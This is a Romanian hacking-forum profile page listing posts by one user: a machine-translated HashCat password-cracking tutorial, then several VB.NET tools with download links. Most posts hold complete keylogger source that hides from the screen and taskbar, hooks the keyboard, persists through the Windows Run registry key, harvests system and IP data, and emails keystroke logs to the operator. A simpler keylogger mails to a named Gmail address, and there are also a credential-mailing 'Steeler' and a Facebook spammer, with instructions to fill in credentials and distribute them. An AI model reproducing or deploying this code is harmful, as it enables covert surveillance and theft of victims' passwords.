Jump to content

bc-vnt

Active Members
  • Posts

    595
  • Joined

  • Last visited

  • Days Won

    4

Everything posted by bc-vnt

  1. HashCat este un program freeware multi-platform? capabil de a recupera parole criptate folosind procesor propriu, versiunea curent? este 0:40 ?i sa impus ca cel mai rapid din lume, în recuperarea parolei. Exist? dou? versiuni ale HashCat capabile s? impulsioneze GPU în loc de CPU, ?i oclHashcat oclHashcat-plus-Lite, acest software este recomandat în cazul în care dori?i s? proceseze preturi mari datorita Hash la posibilitatea de subdivizare sarcinii. În acest articol ne vom concentra pe versiunea istoric? a HashCat posibilitatea de a profita de procesor singura noastr?, instala?i software-ul în distribu?ia Ubuntu Linux si va demonstra cum a recupera parola dvs. cu ajutorul unei brute-force urât (Brute Force) sau un atac de dic?ionar. În cele din urm?, vom face o scurt? referire la versiunea GUI, GUI, cu siguran??, mult mai confortabil pentru mai pu?in experimenta?i. INSTALARE SI PRIMA RULARE http://img840.imageshack.us/img840/6139/print1ga.png Prin intermediul site-ul oficial (oclHashcat-plus - advanced password recovery), desc?rca?i cea mai recent? versiune disponibil? la momentul scrierii este disponibil versiunea 0.40 a lansat 05 august 2012, continua?i s? despacheta?i arhiva ?i s? dea fi?ierul executabil software-ul binar cu urm?toarea comand?: $ chmod +x *.bin $ ./hashcat-cliXX.bin Inlocuiasc "XX" cu valoarea "32", dac? ave?i sistemu pe 32 de bi?i sau valoarea "64" pentru sisteme pe 64 de bi?i, prin ad?ugarea op?iunii-ajutor, s? consulta?i ajutorul online al software-ului. F?r? a porni software-ul s? ne c?l?uzeasc? înapoi la parametrii-cheie pentru a efectua un atac: $ hashcat [options] hashfile [mask|wordfiles|directories] Atacul Brute-Force http://img836.imageshack.us/img836/770/print2ju.png For?? de atac Brute este cu siguranta metoda cea mai complet? pentru a c?uta o parol? pierdut?, dar necesit? o mul?ime de resurse ?i o mul?ime de timp pentru a aduce primele roade, prin urmare, este esen?ial, pentru a cunoa?te toate op?iunile pe care software-ul le face disponibile. Este important s? se configureze corect m??ti Chartsets ?i punerea în aplicare a acestora. HashCat include opt tipuri de seturi de caractere, dar ne permite de a crea altele noi dup? bunul plac, fiecare func?ionar charset este identificat printr-un semn de întrebare, urmat? de o scrisoare, în special: ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = !"#$%&'()*+,-./:;??@[\]^_'{|}~ ?h = 8 bit characters da 0xc0 - 0xff ?D = 8 bit characters dall'alfabeto Tedesco ?F = 8 bit characters dall'alfabeto Francese ?R = 8 bit characters dall'alfabeto Russo Pentru a crea seturi de caractere personalizate, putem folosi setul de caractere implicit sau prin introducerea manual? a caracterelor dorim s? le pun? în aplicare. Pentru a ob?ine un set de caractere complet este recomandabil de a combina caractere alfanumerice (litere mici la A la Z, cu majuscule de la A la Z ?i numere de la 0 la 9) ?i simboluri, apoi am de gând s? creeze caractere propria noastr? stabile?te folosind setul de caractere de default am raportat anterior --custom-charset1=?l?u?d?s Cu aceast? op?iune, am definit un set de caractere complet, variind de la litere, numere ?i simboluri. Un set similar codului ASCII definit de integrarea implicit de caractere mai mult, ne-am folosit de fapt, op?iunea "L", care ne permite sa identifice litere mici?? "U" majuscule "D"? Numere ?i ? "s" simboluri. Dup? introducerea pe seturi de caractere se pot confrunta cu primul nostru meci de for?? de r?u, HashCat suporta algoritmi de criptare sunt printre multe MD5 principal, SHA, MySQL, PHPass, etc cu posibilitatea de a stabili sare de algoritm. În acest exemplu ne vom confrunta cu recuperarea unei parole criptate folosind algoritmul MD5, stocate într-hash.txt dosar ?i va raporta Ouput a analizei noastre în risultato.txt dosar. $ ./hashcat-cliXX.bin -m 0 -a 3 --custom-charset1=?l?u?d?s --pw-min 3 --pw-max 6 hash.txt ?1?1?1?1?1?1 -o risultato.txt Comanda este format din mai multe variante, specifica?i mai întâi tipul de algoritm care vom analiza folosind optiunea "-m", în cazul nostru algoritmul MD5 este egal cu 0, cu optiunea "-o" tip de atac care urmeaz? s? fie f?cute, valoarea 3 se refer? la software-ul pe care trebuie s? efectueze o forta bruta, atunci vom g?si Custom-caractere pe care v-am ar?tat mai devreme, în timp ce cu "-pw-min" si "max-pw-" impute minim ?i maxim? parola. O mai mare aten?ie ar trebui acordat? masca, "1?? 1? 1? 1? 1? 1", acest parametru v? permite s? efectua?i mai specific atac oferindu-ne pentru a personaliza combina?ii de taste pentru a utiliza pentru fiecare liter?. În exemplul nostru vom folosi pentru fiecare liter? a caractere personalizat creat anterior, dar s? presupunem c? ?tim compozi?ia parola pentru a fi recuperat (de exemplu, cognomeXX), se ?tie c? primele ?apte caractere sunt literele ?i celelalte dou? numere. Putem folosi apoi masca "L? L? L? L? L L? L? D? D" pentru a accelera procesul de considerabil, datorit? op?iunii? "De" repetate de ?apte ori precizeaz? c? primele litere mici caractere în timp ce "d?" repetat de dou? ori, la sfâr?itul masca specifica faptul c? personajele sunt ultimele numerice. La finalul procedurii de recuperare, software-ul va salva parolele risultato.txt fi?ierul recuperat cu succes, dac? nu reu?im s? îmbun?t??easc? sistemul de bruteforcing schimbarea switch-uri stabilite anterior. http://img836.imageshack.us/img836/5162/print3gv.png Atacul dictionar http://img7.imageshack.us/img7/7427/print4q.png Atacul dic?ionar este cu siguran?? mai pu?in complex, în ceea ce prive?te op?iunile ?i comenzile din cauza software-ului, dar pentru a ob?ine un rezultat satisf?c?tor, trebuie s? avem dic?ionare cuprinz?toare din care cânt?resc câteva sute de ponderare mega, prin urmare, volumul de munc? în faza de recuperare. Putem g?si dic?ionare, de asemenea, în Italia, prin intermediul Google ?i Torrent tracker. $ ./hashcat-cliXX.bin -m 0 -a 0 hash.txt dizionario.txt -o risultato.txt Prin comanda anterioar?, începe o gra?ie atac dictionar pentru a parametrului specific "-o" de prim rang la 0, op?iunea "-m" ne permite s? specifica?i algoritm pentru a descifra ?i apoi apreciaz? fi?ierul care con?ine hash-uri, dic?ionar ?i fi?ier de ie?ire cu rezultatele. La finalul procedurii de desc?rc?ri ne va aduce distribuire mul?i au fost recuperate în risultato.txt fi?ierul salvandogli. Interfata grafica http://img12.imageshack.us/img12/2518/print5n.png Pentru a profita de HashCat grafice trebuie s? desc?rca?i de pe site-ul oficial în pachet "hashcat-gui", ?i apoi proceda?i pentru a despacheta arhive ?i s? dea fi?iere executabile binare ale software-ului, cu urm?toarea comand?: $ chmod +x *.bin Putem începe apoi programul cu urm?toarea comand? $ ./hashcat-guiXX.bin Aten?ie pentru a înlocui "XX" cu valoarea "32", dac? ave?i o pe 32 de bi?i sau valoarea "64" pentru sistemele pe 64 de bi?i. Acesta începe apoi o interfa?? grafic? convenabil? în care putem specifica fi?ierul care con?ine hash-uri, metoda de atac, masca pentru forta bruta sau de dic?ionar, tipul de algoritm, ?i toate celelalte op?iuni pot fi, de asemenea, gestionate din linia de comand?. Pentru a porni de recuperare a parolei apasati butonul "Start" ?i se va deschide un nou ecran pe linia de comand?, cu dezvoltarea de distribuire ?i rezultatele. SURSA : Password cracking con HashCat - HTML.it Download : oclHashcat-plus - advanced password recovery http://img850.imageshack.us/img850/4813/print6j.png
  2. Neah , in 1 zii am postat si e-mailu si passu pe care e setat, cine a downloadat atunci poate folosii e-mailul ala P.S - Sursa este in thread , sub download .
  3. Pariu pe viata mea ca inainte sa citesti rep's ai downloadat
  4. Done : KeyLogger2.exe download - 2shared P.S - Nu vreau sa fiu cretin vad ca ai 6 pst's deci ori nu prea te pricepi , ori crezi ca e un keyset, NU ESTE UN KEYSET adica il poti seta doar din sorce code postat de mine , unde scrie " YOUR EMAIL / YOUR PASSWORD " pui datele tale dupa il distribui. P.S2 - Merge doar pe smtp.gmail.com / mail.gmx.com , deci trebuie sa ai e-mail pe un din serverele astea pentru ati fi folositor la ceva acesta sursa
  5. Incepand cu inceputu trebuie sa ai netF4 , dar ai sursa , iti poti face 1 singur in 2 minute... mai mult e sa faci designu' cum vrei tu
  6. RSS - Wikipedia, the free encyclopedia
  7. De ce credeti ce le-am pus SPECIAL pentru voi , zilnic cred ca sunt cel putin 10.000 +- searchs on google de surse simple pentru a se invata limbaju'
  8. Download : http://www.2shared.com/file/iC606rlE/KeyLogger2.html ' ****************************************************** ' * CREATED BY bc-vnt * ' * * ' ****************************************************** '# SPECIAL KEYLOGGER FUNCTIONS '1. Runs Invisible from Screen and Taskbar '2. Detects more than 26 letters and also special characters, numbers, hotkeys, lower case, upper case '3. Sends the LOG via E-Mail to your Mail-Address as Mail Attachment which you can download it and analyse it whenever you want '4. Retrieves External IP, and also the Internal Ip (User Network IP), User Location by Country '5. Retrieves Window-Titles of what the User actually hovers at, catches the address of websites the User has clicked '6. The LOG is invisible to the User, so a Users detection is impossible '7. Retrieves Information about Motherboard, RAM, Physical Drives, Virtual Drives, Bios, Processors, Vendor, Username, PC-Name and much more '8. Automatically selfdestructs (uninstalls) after a specific amount of days, which you set by your desire ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' 'BE AWARE THAT THIS IS A VB.NET PROJECT AND ITS ASSEMBLIESS AQUIRE THAT THE NET FRAMEWORK MUST BE PREINSTALLED, ON THE USERS MACHINE, 'THIS IS A NET.FRAMEWORK 2 TARGET PROJECT, SO YOU NEED NET FRAMEWORK 2 (ATLEAST) ON YOU MACHINE, OR ELSE IT WILL NOT WORK! 'IF YOU WANT TO UPGRADE THIS PROJECT TO UPPER FRAMEWORKS OR TO x64 bit ARCHITECTURE YOU CAN DO IT EVERY TIME ON THE VISUAL STUDIO OPTIONS! 'Keylogger tested on: Win7(x86), XP(x86) Imports System.IO Imports System.Net Imports System.Net.Mail Imports System.Net.Mime Imports Microsoft.Win32 Imports System.Diagnostics Imports System.Collections.ObjectModel Public Class Form1 Dim WithEvents K As New Keyboard Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32 Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32 Dim quote As String = """" Dim windowTitle As String Dim selfDestruct As Integer = 30 ' days Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load Me.Location = New Point(-10 - Me.Width, 0) : Me.ShowInTaskbar = False registerApplication() K.CreateHook() ' Adds UserName, ComputerName and current Time to the Log File My.Settings.log = My.Settings.log + vbNewLine + "_________________________________________________" _ + "____________________________________________________________________________" _ + vbNewLine + "Current Time: " + Now.DayOfWeek.ToString + ", " + Now() + vbNewLine + vbNewLine _ + "Computer Name:" + " " + Environment.MachineName + vbNewLine + vbNewLine _ + "Username:" + " " + Environment.UserName + vbNewLine _ + "____________________________________________________________________________" _ + "________________________________________________" _ + vbNewLine + vbNewLine End Sub Private Sub Form1_FormClosing(sender As Object, e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing K.DisposeHook() End Sub Private Sub K_Down(ByVal Key As String) Handles K.Down My.Settings.log = My.Settings.log & Key End Sub Private Function getActiveWindowTitle() As String Dim MyStr As String MyStr = New String(Chr(0), 100) GetWindowText(GetForegroundWindow, MyStr, 100) MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1) Return MyStr End Function Private Function roundObjectSize(ByVal ObjectSize As String) As String Select Case CDec(ObjectSize) Case 0 To CDec(999.999) ObjectSize = Format(CInt(CDec(ObjectSize)), "###,###,###,###,##0 Bytes") Case 1000 To CDec(999999.999) ObjectSize = Format(CInt(CDec(ObjectSize) / 1024), "###,###,###,##0 KB") Case 1000000 To CDec(999999999.999) ObjectSize = Format(CInt(CDec(ObjectSize) / 1024 / 1024), "###,###,##0 MB") Case 1000000000 To CDec(999999999999.999) ObjectSize = Format((((CInt(CDec(ObjectSize) / 1024 / 1024) / 10) \ 10) / 10), "#,###.00 GB") Case Is >= 1000000000000 ObjectSize = Format((((CInt(CDec(ObjectSize) / 1024 / 1024 / 1024) / 10) \ 10) / 10), "#,###.00 TB") End Select Return ObjectSize End Function Private Sub additionalInformations() My.Settings.info = "" ' GET COMPUTER LOCATION THROUGH IP Dim ipinfo As New WebClient Dim city As String Try Dim ip As String = ipinfo.DownloadString("http://www.find-ip-address.org/") city = ip.Substring(ip.IndexOf("IP Address Lookup Location") + 80) city = city.Substring(0, city.IndexOf(" <")) Catch ex As Exception city = "Unable to lookup" End Try My.Settings.info = My.Settings.info + "IP Location: " + city + vbNewLine '______________________________________________________________________________________________________________________________ ' GET EXTERNAL AND INTERNAL IP Try Dim req As HttpWebRequest = WebRequest.Create("http://automation.whatismyip.com/n09230945.asp") Dim res As HttpWebResponse = req.GetResponse() Dim str As Stream = res.GetResponseStream Dim sr As StreamReader = New StreamReader(str) My.Settings.info = My.Settings.info + "External IP: " + sr.ReadToEnd + vbNewLine Dim iphostentry As System.Net.IPHostEntry = System.Net.Dns.GetHostByName(System.Net.Dns.GetHostName) My.Settings.info = My.Settings.info + "Internal IP: " _ + CType(iphostentry.AddressList.GetValue(0), IPAddress).ToString + vbNewLine + vbNewLine Catch End Try '______________________________________________________________________________________________________________________________ ' ADDITIONAL INFORMATIONS Try My.Settings.info = My.Settings.info _ + "User Name: " + Environment.UserName + vbNewLine _ + "Machine Name: " + Environment.MachineName + vbNewLine _ + "OS Version: " _ + Environment.OSVersion.ToString + vbNewLine _ + "OS Fullname: " _ + My.Computer.Info.OSFullName + vbNewLine _ + "OS Platform: " + My.Computer.Info.OSPlatform.ToString + vbNewLine _ + "System Language: " _ + My.Computer.Info.InstalledUICulture.ToString + vbNewLine _ + "Screen Resolution: " _ + My.Computer.Screen.BitsPerPixel.ToString + " Bit" + vbNewLine _ + "Screen Bounds: " _ + My.Computer.Screen.Bounds.Width.ToString + "x" + My.Computer.Screen.Bounds.Height.ToString + vbNewLine _ + "Display Device: " _ + My.Computer.Screen.DeviceName.ToString + vbNewLine Catch End Try '______________________________________________________________________________________________________________________________ ' GET REGISTRY VALUES Try Dim Registry1 As String = "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\BIOS" Dim Registry2 As String = "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0" My.Settings.info = My.Settings.info _ + "Computer Manufacturer: " _ + My.Computer.Registry.GetValue(Registry1, "SystemManufacturer", Nothing).ToString + vbNewLine _ + "Computer Type: " _ + My.Computer.Registry.GetValue(Registry1, "SystemProductName", Nothing).ToString + vbNewLine + vbNewLine _ + "Processor: " _ + My.Computer.Registry.GetValue(Registry2, "ProcessorNameString", Nothing).ToString + vbNewLine _ + "Processor Identifier: " _ + My.Computer.Registry.GetValue(Registry2, "Identifier", Nothing).ToString + vbNewLine _ + "Processor Speed: " _ + (((My.Computer.Registry.GetValue(Registry2, "~MHz", Nothing) / 10) \ 10) / 10).ToString + " GHz" + vbNewLine _ + "Processor Manufacturer: " _ + My.Computer.Registry.GetValue(Registry2, "VendorIdentifier", Nothing).ToString + vbNewLine + vbNewLine _ + "Total Physical Memory (RAM): " _ + roundObjectSize(My.Computer.Info.TotalPhysicalMemory.ToString) + vbNewLine + vbNewLine Catch End Try '______________________________________________________________________________________________________________________________ ' GET BIOS INFORMATIONS Dim objWMIService As Object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Dim colBIOS As Object = objWMIService.ExecQuery("Select * from Win32_BIOS") For Each objBIOS In colBIOS My.Settings.info = My.Settings.info _ + "Bios Manufacturer: " + objBIOS.Manufacturer.ToString + vbNewLine _ + "Bios Serial Number: " + objBIOS.SerialNumber.ToString + vbNewLine _ + "Bios Version: " + objBIOS.SMBIOSBIOSVersion.ToString + vbNewLine _ + "_____________________________________________________________________" + vbNewLine Next '______________________________________________________________________________________________________________________________ ' GET DRIVEs INFORMATIONS Dim drives As ReadOnlyCollection(Of DriveInfo) drives = My.Computer.FileSystem.Drives Try For Each drive As DriveInfo In drives If drive.IsReady Then My.Settings.info = My.Settings.info + vbNewLine _ + drive.DriveType.ToString + " Drive " _ + drive.Name.ToString + vbNewLine _ + "Drive Label: " + drive.VolumeLabel.ToString + vbNewLine _ + "Drive Format: " + drive.DriveFormat.ToString + vbNewLine _ + "Total Drive Size: " + roundObjectSize(drive.TotalSize) + vbNewLine _ + "Total Free Space: " + roundObjectSize(drive.TotalFreeSpace) + vbNewLine Else My.Settings.info = My.Settings.info + vbNewLine _ + "Unknown Drive " + drive.Name.ToString + vbNewLine _ + "(This Drive is not ready, It could be a DVD Drive or a Virtual Drive!)" _ + vbNewLine End If Next Catch End Try End Sub Private Sub registerApplication() ' We register the App only for the current-user since on Vista & Win7 it requieres administrator privileges for other users! ' The path for all users would be Registry.LocalMachine or manually "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\...\Run" Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True) _ .SetValue("Keylogger", quote + Application.ExecutablePath.ToString + quote) ' We create a new key for our app like the proffessionals do, and we set some data there, ' in this case the installation date, thus the app will be able later to identify on what date to uninstall, ' To open Registry Editor if you want, go to Start, type REGEDIT and hit(Win7) or go to Start, go to RUN, type REGEDIT(XP), ' and have a look on the Registry, but dont delete or change anything else there, or your computer will be unstable, or crash! If Registry.CurrentUser.OpenSubKey("Software").OpenSubKey("Keylogger") Is Nothing Then Registry.CurrentUser.CreateSubKey("SOFTWARE\Keylogger") Registry.CurrentUser.OpenSubKey("Software\Keylogger", True).SetValue("Year", Now.Year.ToString) Registry.CurrentUser.OpenSubKey("Software\Keylogger", True).SetValue("Month", Now.Month.ToString) Registry.CurrentUser.OpenSubKey("Software\Keylogger", True).SetValue("Day", Now.Day.ToString) End If End Sub Private Sub sendMail() additionalInformations() Timerwindow.Dispose() K.DisposeHook() Try '######################################################################################## ' HOST WEBSITES http://www.gmx.com/ or http://www.gmail.com/ Dim myHost As String = "mail.gmx.com" ' IF YOU'RE USING GMX AS HOST Dim myHostUserMailAddress As String = "YOUR E-MAIL" ' THIS IS AN EXAMPLE Dim myHostUserPassword As String = "YOUR PASSWORD" ' THIS IS AN EXAMPLE Dim mailReceiver As String = "YOUR E-MAIL" ' THIS IS AN EXAMPLE '######################################################################################## Dim SmtpServer As New SmtpClient() Dim mail As New MailMessage() SmtpServer.Credentials = New Net.NetworkCredential(myHostUserMailAddress, myHostUserPassword) SmtpServer.Host = myHost mail = New MailMessage() mail.From = New MailAddress(myHostUserMailAddress) mail.To.Add(mailReceiver) mail.Subject = Environment.UserName + ", " + Environment.MachineName mail.Body = My.Settings.info Dim ms As New MemoryStream(System.Text.Encoding.ASCII.GetBytes(My.Settings.log)) Dim oAttch As Net.Mail.Attachment = New Net.Mail.Attachment(ms, MediaTypeNames.Text.Plain) Dim disposition As ContentDisposition = oAttch.ContentDisposition disposition.FileName = Environment.UserName + "[" + Environment.MachineName + "]" + ".txt" ' The Name how the Attachment will be named mail.Attachments.Add(oAttch) SmtpServer.Send(mail) mail.Dispose() My.Settings.log = "" Catch ex As Exception End Try K.CreateHook() Timerwindow.Start() End Sub Private Sub unInstaller() If Not Registry.CurrentUser.OpenSubKey("Software\Keylogger") Is Nothing Then ' For example we want our app automatically uninstalled after 30 days, it will check the installation date and calculate the difference. ' and then it will automatically remove our app from the computer. If DateDiff("d", New System.DateTime( _ CInt(Registry.CurrentUser.OpenSubKey("Software\Keylogger").GetValue("Year", Nothing).ToString), _ CInt(Registry.CurrentUser.OpenSubKey("Software\Keylogger").GetValue("Month", Nothing).ToString), _ CInt(Registry.CurrentUser.OpenSubKey("Software\Keylogger").GetValue("Day", Nothing).ToString), _ 12, 0, 0), Now) > selfDestruct Then Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).DeleteValue("Keylogger") Registry.CurrentUser.OpenSubKey("Software", True).DeleteSubKey("Keylogger") Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce", True) _ .SetValue("Uninstaller", quote + Application.StartupPath.ToString + "\Uninstaller.vbs" + quote) ' This code below means if the uninstallation date has come, it will create a VB Script on the same path as the app, ' and it will automatically delete the app and itself on the next Computerstart or Login! File.WriteAllText(Application.StartupPath.ToString + "\Uninstaller.vbs", _ "Set FSO = CreateObject(""Scripting.FileSystemObject"")" + vbNewLine _ + "filename = FSO.GetAbsolutePathName(Wscript.ScriptName)" + vbNewLine _ + "FSO.DeleteFile " + quote + Application.ExecutablePath.ToString + quote + ", True" + vbNewLine _ + "FSO.DeleteFile filename, True") Me.Close() End If End If End Sub Private Sub Timerwindow_Tick(sender As System.Object, e As System.EventArgs) Handles Timerwindow.Tick ' We limit the windowtitlecatches by these names, otherwise the LOG will get large and you wont have the time to read everything! Dim allowedList As String = "Facebook,Youtube,Internet,Google,Mozilla,Chrome,Safari,Live,Messenger,Skype" Dim commaSeparator As Char() = New Char() {","c} Dim result As String() result = AllowedList.Split(CommaSeparator, StringSplitOptions.None) If windowTitle <> GetActiveWindowTitle() Then For Each str As String In result If GetActiveWindowTitle.Contains(str) Then If windowTitle <> GetActiveWindowTitle() Then My.Settings.log = My.Settings.log + vbNewLine + "{{{" + GetActiveWindowTitle() + "}}}" windowTitle = GetActiveWindowTitle() End If End If Next End If End Sub Private Sub Timerchecker_Tick(sender As System.Object, e As System.EventArgs) Handles Timerchecker.Tick ' assuming the LOG reaches limit of 100000 bytes (100Kb = 0,1MB) it will send it via email to you! ' before it will check for the uninstaller if the limit time is reached, e.g 20 days! ' One Byte is equal to 1 letter or number or any other character, so 100000 bytes means 100000 letters! Me.Hide() ' HIDES THE FORM FROM SCREEN If Len(My.Settings.log) > 1000 Then : unInstaller() : sendMail() : End If End Sub End Class Public Class Keyboard Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" (ByVal Hook As Integer, ByVal KeyDelegate As KDel, ByVal HMod As Integer, ByVal ThreadId As Integer) As Integer Private Declare Function CallNextHookEx Lib "user32" (ByVal Hook As Integer, ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer Private Declare Function UnhookWindowsHookEx Lib "user32" Alias "UnhookWindowsHookEx" (ByVal Hook As Integer) As Integer Private Delegate Function KDel(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer Public Shared Event Down(ByVal Key As String) Public Shared Event Up(ByVal Key As String) Private Shared Key As Integer Private Shared KHD As KDel Private Structure KeyStructure : Public Code As Integer : Public ScanCode As Integer : Public Flags As Integer : Public Time As Integer : Public ExtraInfo As Integer : End Structure Public Sub CreateHook() KHD = New KDel(AddressOf Proc) Key = SetWindowsHookEx(13, KHD, System.Runtime.InteropServices.Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly.GetModules()(0)).ToInt32, 0) End Sub Private Function Proc(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer If (Code = 0) Then Select Case wParam Case &H100, &H104 : RaiseEvent Down(Feed(CType(lParam.Code, Keys))) Case &H101, &H105 : RaiseEvent Up(Feed(CType(lParam.Code, Keys))) End Select End If Return CallNextHookEx(Key, Code, wParam, lParam) End Function Public Sub DisposeHook() UnhookWindowsHookEx(Key) MyBase.Finalize() End Sub Private Function Feed(ByVal e As Keys) As String Select Case e Case 65 To 90 If Control.IsKeyLocked(Keys.CapsLock) Or (Control.ModifierKeys And Keys.Shift) <> 0 Then Return e.ToString Else Return e.ToString.ToLower End If Case 48 To 57 If (Control.ModifierKeys And Keys.Shift) <> 0 Then Select Case e.ToString Case "D1" : Return "!" Case "D2" : Return "@" Case "D3" : Return "#" Case "D4" : Return "$" Case "D5" : Return "%" Case "D6" : Return "^" Case "D7" : Return "&" Case "D8" : Return "*" Case "D9" : Return "(" Case "D0" : Return ")" End Select Else Return e.ToString.Replace("D", Nothing) End If Case 96 To 105 Return e.ToString.Replace("NumPad", Nothing) Case 106 To 111 Select Case e.ToString Case "Divide" : Return "/" Case "Multiply" : Return "*" Case "Subtract" : Return "-" Case "Add" : Return "+" Case "Decimal" : Return "." End Select Case 32 Return " " Case 186 To 222 If (Control.ModifierKeys And Keys.Shift) <> 0 Then Select Case e.ToString Case "OemMinus" : Return "_" Case "Oemplus" : Return "+" Case "OemOpenBrackets" : Return "{" Case "Oem6" : Return "}" Case "Oem5" : Return "|" Case "Oem1" : Return ":" Case "Oem7" : Return """" Case "Oemcomma" : Return "<" Case "OemPeriod" : Return ">" Case "OemQuestion" : Return "?" Case "Oemtilde" : Return "~" End Select Else Select Case e.ToString Case "OemMinus" : Return "-" Case "Oemplus" : Return "=" Case "OemOpenBrackets" : Return "[" Case "Oem6" : Return "]" Case "Oem5" : Return "\" Case "Oem1" : Return ";" Case "Oem7" : Return "'" Case "Oemcomma" : Return "," Case "OemPeriod" : Return "." Case "OemQuestion" : Return "/" Case "Oemtilde" : Return "`" End Select End If Case Keys.Return Return Environment.NewLine Case Keys.Back Return " ?" End Select Return Nothing End Function End Class Acesta este mult mai complex
  9. Tot ce iti pot spune este faptu ca " joaca " pe invizibil,in rest copy paste in vb.2010 exp si unde scrie " YOUR E-MAIL " , " PASSWORD " pui datele tale il trimiti / postezi pe undeva si .... DONE ! Daca nu downloadeaza-l pe cel facut de mine si asta e ... te-ai " fript "
  10. Download : KeyLogger.exe download - 2shared Imports System.Net.Mail Public Class Form1 Dim result As Integer Private Declare Function GetAsyncKeystate Lib "user32" (ByVal vKey As Int32) As Int16 Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick For i = 1 To 255 result = 0 result = GetAsyncKeystate(i) If result = 32767 Then RichTextBox1.Text = RichTextBox1.Text + Chr(i) End If Next End Sub Private Sub email_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles email.Tick Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("YOUR E-MAIL") MyMailMessage.To.Add("bcvnt1992@gmail.com") MyMailMessage.Subject = ("KeyLogger") MyMailMessage.Body = RichTextBox1.Text Dim SMTPServer As New SmtpClient("smtp.gmail.com") SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential("YOUR E-MAIL", "PASSWORD") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) RichTextBox1.Text = ("") End Sub Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load End Sub End Class
  11. Download : Steeler.exe download - 2shared Imports System.Net.Mail Public Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim MyMailMessage As New MailMessage Try MyMailMessage.From = New MailAddress("EMAIL GMAIL") MyMailMessage.To.Add("EMAIL GMAIL") MyMailMessage.Subject = "OBJECT EMAIL" MyMailMessage.Body = TextBox1.Text & " " & TextBox2.Text Dim SMTP As New SmtpClient("smtp.gmail.com") SMTP.Port = 587 SMTP.EnableSsl = True SMTP.Credentials = New System.Net.NetworkCredential("YOUR E-MAIL", "PASSWORD") SMTP.Send(MyMailMessage) TextBox2.Text = "" Catch ex As Exception End Try End Sub End Class
  12. Download : http://www.2shared.com/file/YAFl0-GS/exportc.html pass : 99f3e49caf82f8c9135bf088ec0b19de
  13. Download : Zippyshare.com - FB Spammer.exe Download2 : FB Spammer.exe download - 2shared Public Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Timer1.Start() End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click Timer1.Interval = TextBox2.Text * 1000 Timer1.Stop() End Sub Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick SendKeys.Send(TextBox1.Text) SendKeys.Send("{Enter}") End Sub End Class
  14. Sorry daca nu este ok categoria la care am postat , rog un moderator sa il mute 10x !
  15. Download : Automatic Login System.exe download - 2shared Public Class Form1 Public Declare Sub SetCursorPos Lib "user32" (ByVal X As Integer) Public Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Integer, ByVal dx As Integer, ByVal dy As Integer) Public Const MOUSEEVENTF_LEFTDOWN = &H2 Public Const MOUSEEVENTF_LEFTUP = &H4 Public Const MOUSEEVENTF_RIGHTDOWN = &H8 Public Const MOUSEEVENTF_RIGHTUP = &H10 Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick TextBox1.Text = Cursor.Position.X TextBox1.Text = Cursor.Position.Y End Sub Private Sub Button_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim first As Integer = TextBox3.Text Dim second As Integer = TextBox4.Text SetCursorPos(first, second) mouse_event(MOSEEVENTF_LEFTDOWN, 0, 0, 0, 0) mouse_event(MOSEEVENTF_LEFTUP, 0, 0, 0, 0) Timer2.Enabled = True End Sub Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick SendKeys.Send("bc_vnt") SendKeys.Send("(TAB)") SendKeys.Send("(PASSWORD)") SendKeys.Send("(ENTER)") Timer2.Enabled = False End Sub Private Sub SetCursorPos(ByVal first As Integer, ByVal second As Integer) Throw New NotImplementedException End Sub Private Function MOSEEVENTF_LEFTDOWN() As Integer Throw New NotImplementedException End Function Private Sub mouse_event(ByVal p1 As Integer, ByVal p2 As Integer, ByVal p3 As Integer, ByVal p4 As Integer, ByVal p5 As Integer) Throw New NotImplementedException End Sub Private Function MOSEEVENTF_LEFTUP() As Integer Throw New NotImplementedException End Function End Class
